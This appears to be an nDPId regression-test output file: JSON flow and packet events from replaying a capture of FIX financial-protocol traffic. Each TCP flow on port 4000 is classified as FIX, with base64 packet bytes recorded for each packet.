+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1493755109265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109265,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA0nQVAAEAGvtLAqAAUCBEWH7tgD6AYvaG2cL\/HqYAQ\/+ACDgAAAQEICsPYIsvKviai"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755109301,"pkt":"THK5MeMlACJNe\/gxCABFAABPilIAADIGAaLQ9WsDwKgAFA+gsgqYEHEay+C1D1AYXjiwMAAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} 
+00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoLPdAAEAGESTAqAAU0PVrA7IKD6DL4LUPmBBxQVAQ\/\/9nMgAAAAAAAAAA"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00557{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1493755109301,"pkt":"THK5MeMlACJNe\/gxCABFAAB3JWUAAPUGwS8IERYfwKgAFA+gu1Cc6Eb967pj5oAY\/\/+1oAAAAQEICsq+Jsaxc69UOD1GSVguNC4xATk9MDAwMDQxATM1PTABMzQ9MDA2MTI3ATQzPU4BNTI9MjAxNzA1MDItMTk6NTg6MjkBMTA9MTEzAQ=="} +00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB+LPhAAEAGEM3AqAAU0PVrA7IKD6DL4LUPmBBxQVAY\/\/8uDQAAOD1GSVhDT01QATk9NzEBeJwNx7ENgDAMBED9QER+x684kdwisQEtDR0N+xdw3WXtx9miEbPMQugqQ48\/iuGQlxuHyXzjXMrlCdLrvt4HtKKED90WDdY="} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA04B5AAEAGe7nAqAAUCBEWH7tQD6DrumPmnOhHQIAQ\/+BBSgAAAQEICrFztPLKvibG"} +00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1493755109365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1493755109365,"pkt":"THK5MeMlACJNe\/gxCABFAABXdbIAAPUGcQIIERYfwKgAFA+gu2Bwv8epGL2htoAY\/\/9rRwAAAQEICsq+JwbD2CLLOD1PATk9MDAyNAEzNT1HAQCIAAAA1gw\/8YUeuFHrhQAAAAE="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7560000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1493755109440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1493755109440,"pkt":"THK5MeMlACJNe\/gxCABFAABLyzMAADIGwMTQ9WsDwKgAFA+gshDsZRC0r0wvBlAYWghECQAAOD1PATk9MDAyNAEzNT1HAQCIAAAAVgxAWLVwoAAAAAAAAAE="} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7560000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1493755109440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755109440,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoPkFAAEAG\/9nAqAAU0PVrA7IQD6CvTC8G7GUQ11AQo65yMAAAAAAAAAAA"} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1493755109654,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755109654,"pkt":"THK5MeMlACJNe\/gxCABFAABbr+gAAPUGNsgIERYfwKgAFA+gu1oMn5kifDan54AY\/\/9QgQAAAQEICsq+KCgaP0xfOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} +00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1493755109655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109655,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA07JVAAEAGb0LAqAAUCBEWH7taD6B8NqfnDJ+ZSYAQhgAbHwAAAQEICho\/VIrKvigo"} +00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1493755109655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755109655,"pkt":"ACJNe\/gxTHK5MeMlCABFAACK7JZAAEAGbuvAqAAUCBEWH7taD6B8NqfnDJ+ZSYAYhgDh+QAAAQEICho\/VIrKvigoOD1GSVhDT01QATk9NzEBeJwNx7ENgDAMBED9QER+x684kdwisQEtDR0N+xdw3WXtx9miEbPMQugqQ48\/iuGQlxuHyXzjXMrlCdLrvt4HtKKED90WDdY="} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1493755109941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1493755109941,"pkt":"THK5MeMlACJNe\/gxCABFAABLyzQAADIGwMPQ9WsDwKgAFA+gshDsZRDXr0wvBlAYWgiDjAAAOD1PATk9MDAyNAEzNT1HAQCIAAAAWQxAldWZn+Q2dgAAAAE="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7560000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1493755110320,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1493755110320,"pkt":"THK5MeMlACJNe\/gxCABFAAB1U\/wAADIGN9LQ9WsDwKgAFA+glvwzTd9PWnk+l1AYb96N\/wAAOD1PATk9MDA2NgEzNT1HAQHYAAAABVkI5OEMFeFiPZCEMAATlYJyAAAABFkI5OEMFVZHfdCEMAATwIJ3AAAABlkI5OEIW+2APQJxEAQ="} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7560000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1493755110328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755110328,"pkt":"THK5MeMlACJNe\/gxCABFAABb5\/wAAPUG\/rMIERYfwKgAFA+gn9aNJ1RO\/ryrG4AY\/\/8NBQAAAQEICsq+KsnWRqh9OD1PATk9MDAyOAEzNT1HAQCoAAAAAVkI5OEMBKkS\/dCEMAAJlIEx"} +00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1493755110328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755110328,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA0b9ZAAEAG7AHAqAAUCBEWH5\/WD6D+vKsbjSdUdYAQ\/\/\/knQAAAQEICtZGrHjKvirJ"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1493755110362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755110362,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAouAtAAEAGhg\/AqAAU0PVrA5b8D6BaeT6XM03fnFAQ\/GxkGwAAAAAAAAAA"} +00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1493755111422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1493755111422,"pkt":"THK5MeMlACJNe\/gxCABFAABwiaEAAPUGXPoIERYfwKgAFA+gn9aNJ1R1\/ryrG4AY\/\/+zfAAAAQEICsq+Lw\/WRqx4OD1PATk9MDA0OQEzNT1HAQFQAAAADVkI5OEMFgYg3VCIUAATiYF3AAAADFkI5OEMB9wg3RAAEAATiYAA"} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1493755111956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755111956,"pkt":"THK5MeMlACJNe\/gxCABFAABP7\/wAADIGm\/fQ9WsDwKgAFA+glvYLJrChYuT9OVAYYmg1SgAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1493755111956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755111956,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoPOZAAEAGATXAqAAU0PVrA5b2D6Bi5P05CyawyFAQ\/Gz0DgAAAAAAAAAA"} +00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1493755111956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1493755111956,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB9POdAAEAGAN\/AqAAU0PVrA5b2D6Bi5P05CyawyFAY\/GyQmgAAOD1GSVhDT01QATk9NzABeJwFwTEKgEAMBEDyII\/dJIu5g7SCP7C1sbPx\/4Uz1cd5jRy02UDKQg2LbFAVafJ2cIfgG+dSraCR3s\/9vUY05fYD3SIN0A=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1493755113353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755113353,"pkt":"THK5MeMlACJNe\/gxCABFAABP8tQAADIGmR\/Q9WsDwKgAFA+gmLZKUJEYQJIHD1AYWpQ0OgAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1493755113353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1493755113353,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB8GO1AAEAGJNrAqAAU0PVrA5i2D6BAkgcPSlCRP1AY\/\/\/ZrgAAOD1GSVhDT01QATk9NjkBeJwFwTsKgEAQA1ByICWZnbAfmFbwBrY2djbev\/C9Ucd57bkLs8g0motoWZR7Co4KqtOMTXN5rBaQop77eyGWTPzcug3M"} 
+00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1493755113404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1493755113404,"pkt":"THK5MeMlACJNe\/gxCABFAAAo8tUAADIGmUXQ9WsDwKgAFA+gmLZKUJE\/QJIHY1AQWpSMrwAA"} +00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1493755114507,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1493755114507,"pkt":"ACJNe\/gxTHK5MeMlCABFAACB4B9AAEAGe2vAqAAUCBEWH7tQD6DrumPmnOhHQIAY\/+BrUwAAAQEICrFzuwzKvibGOD1GSVhDT01QATk9NjIBeJwNx8ENwDAIA0B5oEYGQxMi8Y3UDbr\/JO39bvV53hHDUE3qhrIJxZ+smkhvp00m\/bLaubYEYzOED2YPC2I="} +00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1493755115297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1493755115297,"pkt":"THK5MeMlACJNe\/gxCABFAAB5U\/0AADIGN83Q9WsDwKgAFA+glvwzTd+cWnk+l1AYb976PQAAOD1PATk9MDA3MAEzNT1HAQH4AAAABVkI5OYMFeFg3lAEMAATioF3AAAABFkI5OYMFVZgnhAAEAATiYAAAAAABlkI5OYMW+2AXhAAEAQTiIAA"} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1493755116662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755116662,"pkt":"THK5MeMlACJNe\/gxCABFAABP0h0AAC8GyO7ZwFYgwKgAFA+g0FJoqda4F+2kj1AYRRhFXQAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} 